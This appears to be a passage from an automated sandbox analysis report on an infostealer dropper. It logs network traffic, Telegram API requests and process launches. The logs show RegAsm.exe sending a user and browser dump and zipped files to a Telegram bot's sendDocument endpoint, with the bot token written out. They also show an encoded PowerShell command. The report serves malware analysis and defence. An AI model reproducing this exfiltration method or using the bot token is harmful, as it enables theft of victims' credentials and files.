                                                                                        Oct 14, 2022 00:42:30.034231901 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034260988 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034287930 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034316063 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034343958 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034372091 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034384012 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034399986 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034415960 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034429073 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034437895 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034459114 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034493923 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063406944 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063456059 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063483953 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063514948 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063535929 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063558102 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063591003 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063616037 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063621044 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063651085 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063682079 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063709021 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063711882 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063741922 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063743114 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063771009 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063790083 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063800097 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063827991 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063843966 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063854933 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063882113 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063895941 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063910961 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063941956 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063952923 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063973904 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.064013958 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.092878103 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092920065 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092943907 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092964888 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092988014 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093012094 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093031883 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093054056 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093074083 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093079090 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093096018 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093118906 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093138933 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093138933 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093151093 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093163013 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093185902 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093203068 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093206882 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093230009 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093250036 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093250990 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093271971 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093276024 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093293905 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093316078 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093332052 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093337059 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093359947 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093365908 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093381882 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093404055 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093408108 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093425989 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093446970 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093467951 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093467951 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093491077 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093492985 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093513012 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093534946 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093552113 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093554974 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093576908 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093585968 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093600035 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093621016 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093621016 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093643904 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093663931 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093664885 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093687057 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093708038 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093713999 CEST4969980192.168.2.341.216.183.235
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 14, 2022 00:45:05.847289085 CEST192.168.2.38.8.8.80xfe94Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        Oct 14, 2022 00:45:06.980432987 CEST192.168.2.38.8.8.80x17eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        Oct 14, 2022 00:45:07.325618029 CEST192.168.2.38.8.8.80xb48fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 14, 2022 00:45:05.866142988 CEST8.8.8.8192.168.2.30xfe94No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        Oct 14, 2022 00:45:06.997174025 CEST8.8.8.8192.168.2.30x17eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        Oct 14, 2022 00:45:07.344508886 CEST8.8.8.8192.168.2.30xb48fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        • api.telegram.org
                                                                                        • 41.216.183.235
                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.349702149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-10-13 22:45:06 UTC0OUTPOST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="e749d4e4-749a-41ce-b152-70d8d1eceec1"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 2227
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2022-10-13 22:45:06 UTC0INHTTP/1.1 100 Continue
                                                                                        2022-10-13 22:45:06 UTC0OUTData Raw: 2d 2d 65 37 34 39 64 34 65 34 2d 37 34 39 61 2d 34 31 63 65 2d 62 31 35 32 2d 37 30 64 38 64 31 65 63 65 65 63 31 0d 0a
                                                                                        Data Ascii: --e749d4e4-749a-41ce-b152-70d8d1eceec1
                                                                                        2022-10-13 22:45:06 UTC0OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                        2022-10-13 22:45:06 UTC0OUTData Raw: 31 32 37 35 39 34 36 30 35 38
                                                                                        Data Ascii: 1275946058
                                                                                        2022-10-13 22:45:06 UTC0OUTData Raw: 0d 0a 2d 2d 65 37 34 39 64 34 65 34 2d 37 34 39 61 2d 34 31 63 65 2d 62 31 35 32 2d 37 30 64 38 64 31 65 63 65 65 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 68 61 72 64 7a 2d 64 75 6d 70 2e 74 78 74 0d 0a 0d 0a
                                                                                        Data Ascii: --e749d4e4-749a-41ce-b152-70d8d1eceec1Content-Disposition: form-data; name=document; filename=user-dump.txt
                                                                                        2022-10-13 22:45:06 UTC0OUTData Raw: 55 73 65 72 20 6e 61 6d 65 3a 20 68 61 72 64 7a 0d 0a 4d 61 63 68 69 6e 65 20 6e 61 6d 65 3a 20 38 34 31 36 31 38 0d 0a 57 6f 72 6b 69 6e 67 20 64 69 72 65 63 74 6f 72 79 3a 20 43 3a 5c 55 73 65 72 73 5c 68 61 72 64 7a 5c 44 65 73 6b 74 6f 70 0d 0a 42 69 74 73 3a 20 36 34 20 42 69 74 0d 0a 41 6e 74 69 76 69 72 75 73 28 73 29 20 61 63 74 69 76 65 3a 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a 3d 2d 2d 2d 2d 2d 44 75 6d 70 20 6f 66 20 63 68 72 6f 6d 65 64 20 62 61 73 65 64 20 62 72 6f 77 73 65 72 73 20 5b 43 3a 5c 55 73 65 72 73 5c 68 61 72 64 7a 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 5d 2d 2d 2d 2d 2d 3d 0d 0a 2d 2d 2d 41 63 63 6f 75 6e 74 73 2d
                                                                                        Data Ascii: User name: userMachine name: 841618Working directory: C:\Users\user\DesktopBits: 64 BitAntivirus(s) active: Windows Defender=-----Dump of chromed based browsers [C:\Users\user\AppData\Local\Google\Chrome\User Data\Default]-----=---Accounts-
                                                                                        2022-10-13 22:45:06 UTC2OUTData Raw: 0d 0a 2d 2d 65 37 34 39 64 34 65 34 2d 37 34 39 61 2d 34 31 63 65 2d 62 31 35 32 2d 37 30 64 38 64 31 65 63 65 65 63 31 2d 2d 0d 0a
                                                                                        Data Ascii: --e749d4e4-749a-41ce-b152-70d8d1eceec1--
                                                                                        2022-10-13 22:45:06 UTC2INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 13 Oct 2022 22:45:06 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 431
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":362,"from":{"id":5796425317,"is_bot":true,"first_name":"Grace","username":"Triliion_bot"},"chat":{"id":1275946058,"first_name":"derick","last_name":"menson","type":"private"},"date":1665701106,"document":{"file_name":"user-dump.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIBamNIlPIID7qPLja0dAwQ6Dwc_aZ_AAIYDgACbJ1BUoZWGUGj4uZlKgQ","file_unique_id":"AgADGA4AAmydQVI","file_size":1928}}}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.349703149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-10-13 22:45:07 UTC3OUTPOST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="faf7003a-b216-46df-be53-6f8f76b435f5"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 13782
                                                                                        Expect: 100-continue
                                                                                        2022-10-13 22:45:07 UTC3INHTTP/1.1 100 Continue
                                                                                        2022-10-13 22:45:07 UTC3OUTData Raw: 2d 2d 66 61 66 37 30 30 33 61 2d 62 32 31 36 2d 34 36 64 66 2d 62 65 35 33 2d 36 66 38 66 37 36 62 34 33 35 66 35 0d 0a
                                                                                        Data Ascii: --faf7003a-b216-46df-be53-6f8f76b435f5
                                                                                        2022-10-13 22:45:07 UTC3OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                        2022-10-13 22:45:07 UTC3OUTData Raw: 31 32 37 35 39 34 36 30 35 38
                                                                                        Data Ascii: 1275946058
                                                                                        2022-10-13 22:45:07 UTC3OUTData Raw: 0d 0a 2d 2d 66 61 66 37 30 30 33 61 2d 62 32 31 36 2d 34 36 64 66 2d 62 65 35 33 2d 36 66 38 66 37 36 62 34 33 35 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 65 6e 73 69 74 69 76 65 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: --faf7003a-b216-46df-be53-6f8f76b435f5Content-Disposition: form-data; name=document; filename=sensitive.zip
                                                                                        2022-10-13 22:45:07 UTC3OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 d9 74 10 55 52 e3 0d dc 83 02 00 00 02 04 00 00 0f 00 00 00 41 51 52 46 45 56 52 54 47 4c 2e 64 6f 63 78 15 93 47 6e 40 31 08 44 f7 91 72 28 57 dc 6d 30 c6 e5 fe 07 c9 cf 16 10 8c 66 1e 0a c9 3b 21 86 42 a3 c9 aa aa 06 be 8e 9d 80 75 2d b8 f0 ac 42 3a 0f 8d 0d a1 f0 7a d1 25 32 08 30 08 b7 8e 77 2b bb 93 7b ac 5c 71 94 df b2 2f 85 e9 25 ae a1 39 09 e4 8b 7e 4b 1d 8c eb ad f7 66 4f 4d 77 a5 2f 90 b9 75 4c 54 24 5f 07 c5 34 71 e6 0c a3 a3 d3 77 9f 3d a9 72 f6 59 bb 40 09 e2 f0 b5 df f9 aa 73 45 e1 00 1d 2c af 21 27 51 47 dd fc 29 ec 79 60 10 05 59 53 69 e1 d1 93 c5 0e 54 ab 90 85 7c 4a ad d7 5c a4 62 e3 10 3b 0d 34 03 5a fc d4 dc 7c 14 26 d3 47 04 8d 94 62 93 11 49 7a 08 a6 c3 c6 71 36 3a b0 59 85 a4 26 c5 a4 63 7d b6 ef 31 cd
                                                                                        Data Ascii: PKtURAQRFEVRTGL.docxGn@1Dr(Wm0f;!Bu-B:z%20w+{\q/%9~KfOMw/uLT$_4qw=rY@sE,!'QG)y`YSiT|J\b;4Z|&GbIzq6:Y&c}1
                                                                                        2022-10-13 22:45:07 UTC16OUTData Raw: 0d 0a 2d 2d 66 61 66 37 30 30 33 61 2d 62 32 31 36 2d 34 36 64 66 2d 62 65 35 33 2d 36 66 38 66 37 36 62 34 33 35 66 35 2d 2d 0d 0a
                                                                                        Data Ascii: --faf7003a-b216-46df-be53-6f8f76b435f5--
                                                                                        2022-10-13 22:45:07 UTC16INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 13 Oct 2022 22:45:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 437
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":363,"from":{"id":5796425317,"is_bot":true,"first_name":"Grace","username":"Triliion_bot"},"chat":{"id":1275946058,"first_name":"derick","last_name":"menson","type":"private"},"date":1665701107,"document":{"file_name":"sensitive.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIBa2NIlPMbJMotOYDZz5UxtLfW_gABEgACGQ4AAmydQVJPo2estpHGtCoE","file_unique_id":"AgADGQ4AAmydQVI","file_size":13484}}}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        2192.168.2.349704149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-10-13 22:45:07 UTC17OUTPOST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="124a0fb1-8a78-4c1b-8ed5-2e41b547b56a"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 315
                                                                                        Expect: 100-continue
                                                                                        2022-10-13 22:45:07 UTC17INHTTP/1.1 100 Continue
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 2d 2d 31 32 34 61 30 66 62 31 2d 38 61 37 38 2d 34 63 31 62 2d 38 65 64 35 2d 32 65 34 31 62 35 34 37 62 35 36 61 0d 0a
                                                                                        Data Ascii: --124a0fb1-8a78-4c1b-8ed5-2e41b547b56a
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 31 32 37 35 39 34 36 30 35 38
                                                                                        Data Ascii: 1275946058
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 0d 0a 2d 2d 31 32 34 61 30 66 62 31 2d 38 61 37 38 2d 34 63 31 62 2d 38 65 64 35 2d 32 65 34 31 62 35 34 37 62 35 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 6d 69 73 63 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: --124a0fb1-8a78-4c1b-8ed5-2e41b547b56aContent-Disposition: form-data; name=document; filename=misc.zip
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 50 4b 05 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: PK
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 0d 0a 2d 2d 31 32 34 61 30 66 62 31 2d 38 61 37 38 2d 34 63 31 62 2d 38 65 64 35 2d 32 65 34 31 62 35 34 37 62 35 36 61 2d 2d 0d 0a
                                                                                        Data Ascii: --124a0fb1-8a78-4c1b-8ed5-2e41b547b56a--
                                                                                        2022-10-13 22:45:07 UTC18INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 13 Oct 2022 22:45:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 428
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":364,"from":{"id":5796425317,"is_bot":true,"first_name":"Grace","username":"Triliion_bot"},"chat":{"id":1275946058,"first_name":"derick","last_name":"menson","type":"private"},"date":1665701107,"document":{"file_name":"misc.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIBbGNIlPOZfoeTDezsFpR_6_03dxSDAAIaDgACbJ1BUmU3RguDUOVVKgQ","file_unique_id":"AgADGg4AAmydQVI","file_size":22}}}


                                                                                        Target ID:0
                                                                                        Start time:00:42:21
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        Imagebase:0x8e0000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.666417537.000000000B141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.291180894.00000000092C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.630141577.000000000AD81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.289147752.0000000008EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.504811512.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low

                                                                                        Target ID:10
                                                                                        Start time:00:43:10
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                                                                                        Imagebase:0x150000
                                                                                        File size:430592 bytes
                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        Target ID:11
                                                                                        Start time:00:43:10
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff745070000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:14
                                                                                        Start time:00:44:16
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Imagebase:0x5c0000
                                                                                        File size:64616 bytes
                                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:15
                                                                                        Start time:00:44:16
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Imagebase:0x180000
                                                                                        File size:64616 bytes
                                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Target ID:16
                                                                                        Start time:00:44:16
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Imagebase:0xa90000
                                                                                        File size:64616 bytes
                                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
